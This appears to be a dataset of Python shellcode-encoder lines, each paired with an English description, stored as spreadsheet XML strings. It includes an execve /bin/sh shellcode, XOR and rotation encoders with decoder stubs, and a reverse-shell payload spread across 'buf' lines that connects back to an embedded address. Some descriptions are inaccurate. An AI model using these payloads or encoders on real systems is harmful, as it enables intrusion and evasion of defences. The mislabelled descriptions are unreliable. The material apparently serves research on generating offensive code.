    <t>def find_valid_xor_byte(bytes, bad_chars):</t>
  </si>
  <si>
    <t>define the function find_valid_xor_byte with input parameters bytes and bad_chars</t>
  </si>
  <si>
    <t>for i in execve_shellcode:</t>
  </si>
  <si>
    <t>loop over execve_shellcode</t>
  </si>
  <si>
    <t>decoder_stub += "\x3c\x16\x32\x0c\x16\x32\x2c\x16"</t>
  </si>
  <si>
    <t>add the string "\x3c\x16\x32\x0c\x16\x32\x2c\x16" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"</t>
  </si>
  <si>
    <t>add the bytes literal "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" to the variable buf</t>
  </si>
  <si>
    <t>y ^= bytearray(shellcode)[1]</t>
  </si>
  <si>
    <t>compute bitwise xor of y and the first element of shellcode converted into a byte array and store the result in the variable y</t>
  </si>
  <si>
    <t>print "Format 1: {0}".format(encoded1)</t>
  </si>
  <si>
    <t>print format the string "Format 1: {0}" with the parameter encoded1</t>
  </si>
  <si>
    <t>n &amp;= mask(width)</t>
  </si>
  <si>
    <t>store in the variable n the result of the bitwise and  operation between n and the function mask with the parameter width</t>
  </si>
  <si>
    <t>try:</t>
  </si>
  <si>
    <t>try</t>
  </si>
  <si>
    <t>encoded2 += '%02x,' %(h &amp; 0xff)</t>
  </si>
  <si>
    <t>Convert the value of h bitwise and 0xff to a hexadecimal, concatenate the result with the string ',' and then add it to the variable encoded2</t>
  </si>
  <si>
    <t>encoded2 += '0x%02x,' % 0xAA</t>
  </si>
  <si>
    <t>concatenate the string '0x' with the hexadecimal conversion of 0xAA and append the result to the string encoded2</t>
  </si>
  <si>
    <t>print encoded2</t>
  </si>
  <si>
    <t>print encoded2 to the standard output</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' %xor</t>
  </si>
  <si>
    <t>convert xor in hexadecimal and append it followed by ', ' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>print "[i] Counter: "+str(counter)</t>
  </si>
  <si>
    <t>append counter converted to string to the string "[i] Counter: ", print it to the standard output</t>
  </si>
  <si>
    <t>for i in random.sample(range(1, 256), 255):</t>
  </si>
  <si>
    <t>iterate i over 255 random numbers between 1 and 256</t>
  </si>
  <si>
    <t>orig.append(i)</t>
  </si>
  <si>
    <t>append i to orig</t>
  </si>
  <si>
    <t>decoder_stub += "\x88\x2c\x04\x88\x4c\x04\x01\x88"</t>
  </si>
  <si>
    <t>add the string "\x88\x2c\x04\x88\x4c\x04\x01\x88" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"</t>
  </si>
  <si>
    <t>add the bytes literal "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" to the variable buf</t>
  </si>
  <si>
    <t>print "Format 2: {0}".format(encoded2)</t>
  </si>
  <si>
    <t>print format the string "Format 2: {0}" with the parameter encoded2</t>
  </si>
  <si>
    <t>mask_value = mask(width)</t>
  </si>
  <si>
    <t>call the function mask with the argument width and save the return value in mask_value</t>
  </si>
  <si>
    <t>set leader to the first command-line argument after casting it to an int</t>
  </si>
  <si>
    <t>set leader to the second command-line argument after casting it to an int</t>
  </si>
  <si>
    <t>print encoded</t>
  </si>
  <si>
    <t>print encoded to the standard output</t>
  </si>
  <si>
    <t>x = ~x</t>
  </si>
  <si>
    <t>x is not x</t>
  </si>
  <si>
    <t>print 'Len: %d' % len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>print 'Len: %d' to the standard output, with '%d' replaced with len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>original_shellcode += '0x'</t>
  </si>
  <si>
    <t>append string '0x' to original_shellcode</t>
  </si>
  <si>
    <t>print "[i] Instruction in hex: "+ hex(x)</t>
  </si>
  <si>
    <t>append x converted to hexadecimal to the string "[i] Instruction in hex: ", print it to the standard output</t>
  </si>
  <si>
    <t>encoded += '%02x'%(x+7)</t>
  </si>
  <si>
    <t>convert (x+7) to hexadecimal and append it to the string encoded</t>
  </si>
  <si>
    <t>matched_a_byte = False</t>
  </si>
  <si>
    <t>matched_a_byte is initialized to False</t>
  </si>
  <si>
    <t>while x &lt; shellcode_len:</t>
  </si>
  <si>
    <t xml:space="preserve">while x is less than shellcode_len </t>
  </si>
  <si>
    <t>decoder_stub += "\x7c\x04\x02\x88\x5c\x04\x03\x39"</t>
  </si>
  <si>
    <t>add the string "\x7c\x04\x02\x88\x5c\x04\x03\x39" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"</t>
  </si>
  <si>
    <t>add the bytes literal "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" to the variable buf</t>
  </si>
  <si>
    <t>Convert the value of y to a hexadecimal then add it to the variable encoded</t>
  </si>
  <si>
    <t>return ((n &lt;&lt; rotations) &amp; mask_value) | (n &gt;&gt; (width - rotations))</t>
  </si>
  <si>
    <t>return the result of bitwise leftshift of n and rotations bitwise and the function mask with the parameter width  bitwise or with the bitwise righthift of n and subtraction of rotations from width</t>
  </si>
  <si>
    <t>fb = int(hex(leader)[2:3],16)</t>
  </si>
  <si>
    <t>Convert the value of leader to hexadecimal, then slice it between the indicies 2 and 3, convert it to an int16 and add its value to the variable fb</t>
  </si>
  <si>
    <t>encoded += '\\xcc'</t>
  </si>
  <si>
    <t>append string '\\xcc' to encoded</t>
  </si>
  <si>
    <t>encodedP2 += '\\x'</t>
  </si>
  <si>
    <t>append string '\\x' to encodedP2</t>
  </si>
  <si>
    <t>new = ~i &amp; 0xff</t>
  </si>
  <si>
    <t>new is not i and 0xff</t>
  </si>
  <si>
    <t>original_shellcode += '%02x, ' %x</t>
  </si>
  <si>
    <t>convert the value x in hexadecimal and append it to the string original_shellcode followed by ','</t>
  </si>
  <si>
    <t>print "[i] Instruction in decimal: "+ str(x)</t>
  </si>
  <si>
    <t>append x converted to string to the string "[i] Instruction in hex: ", print it to the standard output</t>
  </si>
  <si>
    <t>for byte in bad_chars:</t>
  </si>
  <si>
    <t>iterate bytes in list bad_chars</t>
  </si>
  <si>
    <t>swapped.append(execve_shellcode[x+1])</t>
  </si>
  <si>
    <t>append the element x + 1 of execve_shellcode to swapped</t>
  </si>
  <si>
    <t>decoder_stub += "\x7c\x16\x05\x74\x0a\x42\x42\x42"</t>
  </si>
  <si>
    <t>add the string "\x7c\x16\x05\x74\x0a\x42\x42\x42" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"</t>
  </si>
  <si>
    <t>add the bytes literal "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" to the variable buf</t>
  </si>
  <si>
    <t>def ror(n, rotations, width=8):</t>
  </si>
  <si>
    <t>define a method named ror with the parameters n, rotations, and width. Width has a default value of 8</t>
  </si>
  <si>
    <t>sb = int(hex(leader)[3:],16)                                      # Split the LEADER. If LEADER = AF --&gt;sb=F</t>
  </si>
  <si>
    <t>Convert the value of leader to hexadecimal, then slice it at index 3, convert it to an int16 and set its value to the variable sb</t>
  </si>
  <si>
    <t>encodedP2 += '%02x' % x</t>
  </si>
  <si>
    <t>convert the value x to hex and append it to the string encoded2P2</t>
  </si>
  <si>
    <t>new = new &lt;&lt; shift</t>
  </si>
  <si>
    <t>new is new shifted left by shift</t>
  </si>
  <si>
    <t>for y in bytearray(shellcode):</t>
  </si>
  <si>
    <t>if counter % 2 == 0 :</t>
  </si>
  <si>
    <t>if counter modulo 2 is equal to 0</t>
  </si>
  <si>
    <t>encoded2 += '%02x,' %(x+7)</t>
  </si>
  <si>
    <t>convert (x+7) to hexadecimal, concatenate the result with the string ',' and append it to the string encoded2</t>
  </si>
  <si>
    <t>if i == int(byte.encode('hex'), 16):</t>
  </si>
  <si>
    <t>convert the string byte to hex, then cast the result to int16 and then check if it is equal to i</t>
  </si>
  <si>
    <t>swapped.append(execve_shellcode[x])</t>
  </si>
  <si>
    <t>append the element x of execve_shellcode to swapped</t>
  </si>
  <si>
    <t>decoder_stub += "\x42\x42\x83\xc0\x04\x75\xc5\xff"</t>
  </si>
  <si>
    <t>add the string "\x42\x42\x83\xc0\x04\x75\xc5\xff" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"</t>
  </si>
  <si>
    <t>add the bytes literal "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" to the variable buf</t>
  </si>
  <si>
    <t>encoded = ' '</t>
  </si>
  <si>
    <t>set encoded to an empty string</t>
  </si>
  <si>
    <t>encoded += '%02x' % (x &amp; 0xff)</t>
  </si>
  <si>
    <t>append to the string encoded the hexadecimal conversion of the and operation between x and 0xff</t>
  </si>
  <si>
    <t>new = new ^ xor</t>
  </si>
  <si>
    <t>new is new xor xor</t>
  </si>
  <si>
    <t>byte = (y + ROT)%256</t>
  </si>
  <si>
    <t>byte is the sum of y and ROT modulo 256</t>
  </si>
  <si>
    <t>print "[i] EVEN index, therefore do ROR"</t>
  </si>
  <si>
    <t>print string "[i] EVEN index, therefore do ROR" to the standard output</t>
  </si>
  <si>
    <t>len(bytearray(shellcode)))</t>
  </si>
  <si>
    <t>return the length of array of bytes of the string shellcode</t>
  </si>
  <si>
    <t>matched_a_byte = True</t>
  </si>
  <si>
    <t>matched_a_byte is True</t>
  </si>
  <si>
    <t>x += 2</t>
  </si>
  <si>
    <t>increment x by 2</t>
  </si>
  <si>
    <t>decoder_stub += "\xe4\xe8\xa4\xff\xff\xff"</t>
  </si>
  <si>
    <t>add the string "\xe4\xe8\xa4\xff\xff\xff" to the variable decoder_stub</t>
  </si>
  <si>
    <t>buf += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x74\xc7\x68"</t>
  </si>
  <si>
    <t>add the bytes literal "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x74\xc7\x68" to the variable buf</t>
  </si>
  <si>
    <t>n = 1</t>
  </si>
  <si>
    <t>set the variable n to the value 1</t>
  </si>
  <si>
    <t>check if the variable rotations is less than 1</t>
  </si>
  <si>
    <t>encoded2 = ' '</t>
  </si>
  <si>
    <t>set the variable encoded2 to an empty string</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % random.randint(1,169)</t>
  </si>
  <si>
    <t>convert to hexadecimal a random integer between 1 and 169 and append it to the string encoded</t>
  </si>
  <si>
    <t>byte = byte &lt;&lt; nbits</t>
  </si>
  <si>
    <t>byte is byte shifted left by nbits</t>
  </si>
  <si>
    <t>res1 = ((x &amp; val1) &gt;&gt; val2)</t>
  </si>
  <si>
    <t>right shift by val2 the and operation between x and val1 and assign it to res1</t>
  </si>
  <si>
    <t>break</t>
  </si>
  <si>
    <t>print("[&gt;] Original shellcode:\n--------------------------")</t>
  </si>
  <si>
    <t>print "[&gt;] Original shellcode:\n--------------------------"</t>
  </si>
  <si>
    <t>random.seed()</t>
  </si>
  <si>
    <t>initialize a random number generator</t>
  </si>
  <si>
    <t>buf += b"\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"</t>
  </si>
  <si>
    <t>add the bytes literal "\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" to the variable buf</t>
  </si>
  <si>
    <t>for x in bytearray(shellcode)[2:]:</t>
  </si>
  <si>
    <t>declare a for loop with an iterator x for each element in shellcode starting from index 2 converted into a bytearray</t>
  </si>
  <si>
    <t>return the value n</t>
  </si>
  <si>
    <t>encoded = '\\x'</t>
  </si>
  <si>
    <t>set encoded to the string '\\x'</t>
  </si>
  <si>
    <t>print "Shellcode Len: %d" % len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>print "Shellcode Len: %d", with %d replaced with len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' %new</t>
  </si>
  <si>
    <t>append the hexadecimal conversion of new followed by ', ' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>byte = byte ^ XOR</t>
  </si>
  <si>
    <t>byte is byte xor XOR</t>
  </si>
  <si>
    <t>res2 = x &lt;&lt; (max_bits - val2)</t>
  </si>
  <si>
    <t>left shift x by max_bits minus val2 and assign the result to res2</t>
  </si>
  <si>
    <t>print 'Len:' and length of the array of bytes of the shellcode string</t>
  </si>
  <si>
    <t>for byte in bytes:</t>
  </si>
  <si>
    <t>iterate byte in the list bytes</t>
  </si>
  <si>
    <t>print(orig)</t>
  </si>
  <si>
    <t>print the contents of orig</t>
  </si>
  <si>
    <t>if len(sys.argv) &lt; 2:</t>
  </si>
  <si>
    <t>check if the total number of command-line arguments are less than 2</t>
  </si>
  <si>
    <t>buf += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"</t>
  </si>
  <si>
    <t>add the bytes literal "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" to the variable buf</t>
  </si>
  <si>
    <t>if x == bytearray(shellcode)[n]:</t>
  </si>
  <si>
    <t>check if x is equivalent to the element n in shellcode converted into a bytearray</t>
  </si>
  <si>
    <t>encoded += hex(leader)[2:]</t>
  </si>
  <si>
    <t>Convert the value of leader to hexadecimal, then slice it at the index of 2 and add its value to the variable encoded</t>
  </si>
  <si>
    <t>print "Encoded Shellcode Len: %d" % len(bytearray(encoded))</t>
  </si>
  <si>
    <t>print "Encoded Shellcode Len: %d" to the standard output, with %d replaced with len(bytearray(encoded))</t>
  </si>
  <si>
    <t>res2 = res2 &amp; val1</t>
  </si>
  <si>
    <t>res2 is the result of the and operation between res2 and val1</t>
  </si>
  <si>
    <t>convert to integer base 16 the string byte encoded to hex and check if it is equal to i</t>
  </si>
  <si>
    <t>print("\n[&gt;] Encoded Shellcode:\n--------------------------")</t>
  </si>
  <si>
    <t>print "\n[&gt;] Encoded Shellcode:\n--------------------------"</t>
  </si>
  <si>
    <t>print('Usage: {name} [shellcode_file]'.format(name = sys.argv[0]))</t>
  </si>
  <si>
    <t>print format the string 'Usage {name} [shellcode_file] with the parameter name set to the first command-line argument</t>
  </si>
  <si>
    <t>buf += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"</t>
  </si>
  <si>
    <t>add the bytes literal "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" to the variable buf</t>
  </si>
  <si>
    <t>return (n &gt;&gt; rotations) | ((n &lt;&lt; (width - rotations)) &amp; mask_value)</t>
  </si>
  <si>
    <t xml:space="preserve">return the result of bitwise rightshift of n and rotations or the bitwise leftshift of n and subtract rotations from width and the bitwise and operation of the value returned from the function mask with the parameter width </t>
  </si>
  <si>
    <t>encoded2 = '0x'</t>
  </si>
  <si>
    <t>set encoded2 to the string '0x'</t>
  </si>
  <si>
    <t>encoded = encoded + end</t>
  </si>
  <si>
    <t>append end to encoded</t>
  </si>
  <si>
    <t>encoded2P2 += '0x'</t>
  </si>
  <si>
    <t>append string '0x' to encoded2P2</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' %byte</t>
  </si>
  <si>
    <t>append the hexadecimal conversion of byte followed by ', ' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>rox_encoded_instruction = res1 | res2</t>
  </si>
  <si>
    <t>rox_encoded_instruction is the result of the or operation between res1 and res2</t>
  </si>
  <si>
    <t>print(swapped)</t>
  </si>
  <si>
    <t>print swapped</t>
  </si>
  <si>
    <t>exit(1)</t>
  </si>
  <si>
    <t>terminate the program with exit code 1</t>
  </si>
  <si>
    <t>buf += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"</t>
  </si>
  <si>
    <t>add the bytes literal "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" to the variable buf</t>
  </si>
  <si>
    <t>shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";</t>
  </si>
  <si>
    <t>store in the variable shellcode b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>encoded2 += hex(leader)[2:]</t>
  </si>
  <si>
    <t>Convert the value of leader to hexadecimal, then slice it at the index of 2 and add its value to the variable encoded2</t>
  </si>
  <si>
    <t>encoded2P2 += '%02x,' % x</t>
  </si>
  <si>
    <t>convert the value x to hex, concatenate the result with ',' and append it to the string encoded2P2</t>
  </si>
  <si>
    <t>print encoded_shellcode</t>
  </si>
  <si>
    <t>print encoded_shellcode to the standard output</t>
  </si>
  <si>
    <t>print Y + "Original Shellcode: " + P + original_shellcode + W</t>
  </si>
  <si>
    <t>append strings "Original shellcode: ", P, original_shellcode and W to Y, print it to the standard output</t>
  </si>
  <si>
    <t>exit from the iteration</t>
  </si>
  <si>
    <t>swapped=binascii.hexlify(bytearray(swapped))</t>
  </si>
  <si>
    <t>swapped is the hexadecimal represenation of the array of bytes swapped</t>
  </si>
  <si>
    <t>set the variable shellcode_file to the first command-line argument</t>
  </si>
  <si>
    <t>set the variable shellcode_file to the second command-line argument</t>
  </si>
  <si>
    <t>buf += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"</t>
  </si>
  <si>
    <t>add the bytes literal "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" to the variable buf</t>
  </si>
  <si>
    <t>decoded = ""</t>
  </si>
  <si>
    <t>initialize an empty string variable called decoded</t>
  </si>
  <si>
    <t>i=0</t>
  </si>
  <si>
    <t>set the variable i to 0</t>
  </si>
  <si>
    <t>nasm = str(encoded).replace("\\x", ",0x")</t>
  </si>
  <si>
    <t>convert encoded to string and replace all occurrences of "\\x" with ",0x" in it</t>
  </si>
  <si>
    <t>count += 1</t>
  </si>
  <si>
    <t>increment count by 1</t>
  </si>
  <si>
    <t>print Y + "Encoded Shellcode : " + P + encoded_shellcode  + Y + XOR_HEX + W</t>
  </si>
  <si>
    <t>append strings "Encoded shellcode: ", P, encoded_shellcode, XOR_HEX, Y and W to Y, print it to the standard output</t>
  </si>
  <si>
    <t>print "[i] ODD index therefore do ROL"</t>
  </si>
  <si>
    <t>print string "[i] ODD index therefore do ROL" to the standard output</t>
  </si>
  <si>
    <t>for bad_byte in bad_chars:</t>
  </si>
  <si>
    <t>iterate bad_byte in bad_chars</t>
  </si>
  <si>
    <t>swapped="0x"+"0x".join(a+b for a,b in zip(swapped[::2], swapped[1::2]))</t>
  </si>
  <si>
    <t>add "0x" to every 2 characters of the string swapped</t>
  </si>
  <si>
    <t>with open(shellcode_file) as f:</t>
  </si>
  <si>
    <t>open the file stored in shellcode_file using an alias variable f</t>
  </si>
  <si>
    <t>buf += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"</t>
  </si>
  <si>
    <t>add the bytes literal "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" to the variable buf</t>
  </si>
  <si>
    <t>decoded2 = ""</t>
  </si>
  <si>
    <t>initialize an empty string variable called decoded2</t>
  </si>
  <si>
    <t>Make a for loop for each x in the bytearray of shellcode</t>
  </si>
  <si>
    <t>nasm = nasm[1:]</t>
  </si>
  <si>
    <t>substitute elements of nasm from the index 1 to end for nasm</t>
  </si>
  <si>
    <t>print encoded + encodedP2</t>
  </si>
  <si>
    <t>append encodedP2 to encoded, print it to the standard output</t>
  </si>
  <si>
    <t xml:space="preserve">res1 = (x &lt;&lt; val2) &amp; (val1) </t>
  </si>
  <si>
    <t>perform the and operation between x shifted left by val2 and val1 and assign the result to res1</t>
  </si>
  <si>
    <t>val1 = int(byte.encode('hex'), 16) ^ i</t>
  </si>
  <si>
    <t>val1 is the result of the bitwise xor between the integer base 16 of the string byte encoded to hex and i</t>
  </si>
  <si>
    <t>swapped=", ".join(swapped[i:i+4] for i in range(0, len(swapped), 4))</t>
  </si>
  <si>
    <t>separate every 4 characters of the string swapped with the separator ",  "</t>
  </si>
  <si>
    <t>shellcode_original = bytearray.fromhex(f.read().strip().replace('\\x',''))</t>
  </si>
  <si>
    <t>read the file f as a bytearray from hexadecimal values remove whitespaces and replace all occurences of the string '\\x' with ''" and store the result in shellcode_original</t>
  </si>
  <si>
    <t>buf += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"</t>
  </si>
  <si>
    <t>add the bytes literal "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" to the variable buf</t>
  </si>
  <si>
    <t>n += 1</t>
  </si>
  <si>
    <t>increment the variable n by 1</t>
  </si>
  <si>
    <t>i += 1</t>
  </si>
  <si>
    <t>add 1 to the value of i</t>
  </si>
  <si>
    <t>print "NASM version:"</t>
  </si>
  <si>
    <t>print "NASM version:" to the standard output</t>
  </si>
  <si>
    <t>print encoded2 + encoded2P2</t>
  </si>
  <si>
    <t>append encoded2P2 to encoded2, print it to the standard output</t>
  </si>
  <si>
    <t>res2 = (x &amp; val1)</t>
  </si>
  <si>
    <t>res2 is the result of the and operation between x and val1</t>
  </si>
  <si>
    <t>if struct.pack('B', val1 ^ i) == bad_byte:</t>
  </si>
  <si>
    <t>check if the bytes object containing the value val1 xor i packed according to the format string unsigned char is equal to bad_byte</t>
  </si>
  <si>
    <t>print("\n[&gt;] Nasm:\n--------------------------\n{}").format(swapped)</t>
  </si>
  <si>
    <t>print "\n[&gt;] Nasm:\n--------------------------\n{}" and the value of swapped</t>
  </si>
  <si>
    <t>if len(shellcode_original) % 4 != 0:</t>
  </si>
  <si>
    <t>if the length of shellcode_original is not divisable by 4</t>
  </si>
  <si>
    <t>buf += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"</t>
  </si>
  <si>
    <t>add the bytes literal "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" to the variable buf</t>
  </si>
  <si>
    <t>hopcode = '%02x' %x</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal and store it in the variable hopcode</t>
  </si>
  <si>
    <t>print nasm</t>
  </si>
  <si>
    <t>print nasm to the standard output</t>
  </si>
  <si>
    <t>res2 = res2 &gt;&gt; (max_bits-val2)</t>
  </si>
  <si>
    <t>right shift res2 by max_bits minus val2</t>
  </si>
  <si>
    <t>padding = 4 - (len(shellcode_original) % 4)</t>
  </si>
  <si>
    <t>set the variable padding equal to 4 minus the length of shellcode_original modulus 4</t>
  </si>
  <si>
    <t>buf += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"</t>
  </si>
  <si>
    <t>add the bytes literal "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" to the variable buf</t>
  </si>
  <si>
    <t>y = x^bytearray(shellcode)[n]</t>
  </si>
  <si>
    <t>set the variable y equal to x bitwise xor the element n of shellcode converted into a bytearray</t>
  </si>
  <si>
    <t>Dec_hopcode = int(hopcode, 16)</t>
  </si>
  <si>
    <t>cast the string hopcode to int16 and save it into the variable Dec_hopcode</t>
  </si>
  <si>
    <t>print 'Replace number to: %d' % (count/2)</t>
  </si>
  <si>
    <t>print 'Replace number to: %d' to the standard output, with '%d' replaced with count divided by 2</t>
  </si>
  <si>
    <t>break the cycle</t>
  </si>
  <si>
    <t>buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"</t>
  </si>
  <si>
    <t>add the bytes literal "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" to the variable buf</t>
  </si>
  <si>
    <t>decoded += '\\x'</t>
  </si>
  <si>
    <t>add the string value '\\x' to the variable decoded</t>
  </si>
  <si>
    <t>suplX = 255 - Dec_hopcode</t>
  </si>
  <si>
    <t>subtract Dec_hopecode from 255 and store the result in variable suplX</t>
  </si>
  <si>
    <t>encoded_instruction_in_hex = '%02x' % rox_encoded_instruction</t>
  </si>
  <si>
    <t>encoded_instruction_in_hex is a string containing the hexadecimal conversion of rox_encoded_instruction</t>
  </si>
  <si>
    <t>if matched_a_byte:</t>
  </si>
  <si>
    <t>if matched_a_byte is True</t>
  </si>
  <si>
    <t>padding = 0</t>
  </si>
  <si>
    <t>set the variable padding equal to 0</t>
  </si>
  <si>
    <t>initialize the variable encoded_shellcode to an empty string</t>
  </si>
  <si>
    <t>decoded += '%02x' % x</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal and store it in the variable decoded</t>
  </si>
  <si>
    <t>rev_suplx = hex(suplX)[::-1]</t>
  </si>
  <si>
    <t>get the hexadecimal value of suplX and reverse its order then store the value in rev_suplx</t>
  </si>
  <si>
    <t>print "[i] Encoded instruction in hex: "+encoded_instruction_in_hex +"\n"</t>
  </si>
  <si>
    <t>append encoded_instruction_in_hex and string "\n" to string "[i] Encoded instruction in hex: ", print it to the standard output</t>
  </si>
  <si>
    <t>break the loop</t>
  </si>
  <si>
    <t>if padding:</t>
  </si>
  <si>
    <t>check if padding does not equal 0</t>
  </si>
  <si>
    <t>encoded_nasm = ""</t>
  </si>
  <si>
    <t>initialize the variable encded_nasm to an empty string</t>
  </si>
  <si>
    <t>decoded2 += '0x'</t>
  </si>
  <si>
    <t>add the string value '0x' to the variable decoded</t>
  </si>
  <si>
    <t>subfs = fb-sb</t>
  </si>
  <si>
    <t>subtract sb from fb and store the result in the variable subfs</t>
  </si>
  <si>
    <t>format_0x += '0x'</t>
  </si>
  <si>
    <t>append string '0x' to format_0x</t>
  </si>
  <si>
    <t>if not matched_a_byte:</t>
  </si>
  <si>
    <t>if matched_a_byte is not True</t>
  </si>
  <si>
    <t>print('[+] Shellcode not 4 bytes aligned, adding {} \\x90 bytes of padding...'.format(padding))</t>
  </si>
  <si>
    <t>print format the string '[+] Shellcode not 4 bytes aligned, adding {} \\x90 bytes of padding...' with the parameter padding</t>
  </si>
  <si>
    <t>for x in bytearray(buf) :</t>
  </si>
  <si>
    <t>Make a for loop for each x in the bytearray of buf</t>
  </si>
  <si>
    <t>decoded2 += '%02x,' % x</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal and add it to the variable decoded2 followed by ','</t>
  </si>
  <si>
    <t>xxx = hex(int(abs(subfs)) + int(rev_suplx[0:2],16))</t>
  </si>
  <si>
    <t>Take the absolute value of subfs then convert subfs to an integer, then cast to a hexadecimal, slice the variable rev_suplx between the indicies 0 and 2 then cast rev_suplx to the type int16, store the value of the summation in the variable xxx</t>
  </si>
  <si>
    <t>format_0x += encoded_instruction_in_hex+","</t>
  </si>
  <si>
    <t>append encoded_instruction_in_hex and string "," to format_0x</t>
  </si>
  <si>
    <t>return i</t>
  </si>
  <si>
    <t>for i in range(0, padding):</t>
  </si>
  <si>
    <t>initialize a for loop with an iterator i with a range starting from 0 until the value of padding</t>
  </si>
  <si>
    <t>y = x ^ 0x88</t>
  </si>
  <si>
    <t>set the variable y to x bitwise xor of 0x88</t>
  </si>
  <si>
    <t xml:space="preserve">if len(xxx)&gt;4:                                           </t>
  </si>
  <si>
    <t>Check if the length of xxx  is greater than 4</t>
  </si>
  <si>
    <t>print "\n[+] Shellcode custom encoding done"</t>
  </si>
  <si>
    <t>print string "\n[+] Shellcode custom encoding done" to the standard output</t>
  </si>
  <si>
    <t>if the number of arguments is lower than 2</t>
  </si>
  <si>
    <t>shellcode_original.append(0x90)</t>
  </si>
  <si>
    <t>append 0x90 to the shellcode_original variable</t>
  </si>
  <si>
    <t>x = y - 0x10</t>
  </si>
  <si>
    <t>set x to y minus 0x10</t>
  </si>
  <si>
    <t>print the variable encoded to stdout</t>
  </si>
  <si>
    <t>rand = random.randint(1,8)</t>
  </si>
  <si>
    <t xml:space="preserve">generate a random integer between 1 and 8 and store it in a variable called rand </t>
  </si>
  <si>
    <t>print 'Overflow encoding.Try again!!!.'</t>
  </si>
  <si>
    <t>print the string 'Overflow encoding.Try again!!!.'</t>
  </si>
  <si>
    <t>print "\n[i] Initial shellcode length: %d" % len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>print string "\n[i] Initial shellcode length: %d" with %d replaced with len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>print 'Usage: python {name} [shellcode] [optional: bad_chars]'.format(name = sys.argv[0])</t>
  </si>
  <si>
    <t>print 'Usage: python {name} [shellcode] [optional: bad_chars]'.format(name = sys.argv[0])'</t>
  </si>
  <si>
    <t>shellcode_encoded = bytearray()</t>
  </si>
  <si>
    <t>initialize the variable shellcode_encoded to a bytearray</t>
  </si>
  <si>
    <t>y = x ^ 0x97</t>
  </si>
  <si>
    <t>set y to x bitwise xor of 0x97</t>
  </si>
  <si>
    <t>print the variable encoded2 to stdout</t>
  </si>
  <si>
    <t>x = rol(x,rand)  # random (1-8) bit rotation to left</t>
  </si>
  <si>
    <t>assign the variable x the value of the function rol with x and rand as parameters</t>
  </si>
  <si>
    <t>sys.exit()</t>
  </si>
  <si>
    <t>terminate the program</t>
  </si>
  <si>
    <t>length_format_0x = format_0x.count(',')</t>
  </si>
  <si>
    <t>length_format_0x is the count of "," in format_0x</t>
  </si>
  <si>
    <t>exit with failure</t>
  </si>
  <si>
    <t>for i in range(0, len(shellcode_original), 4):</t>
  </si>
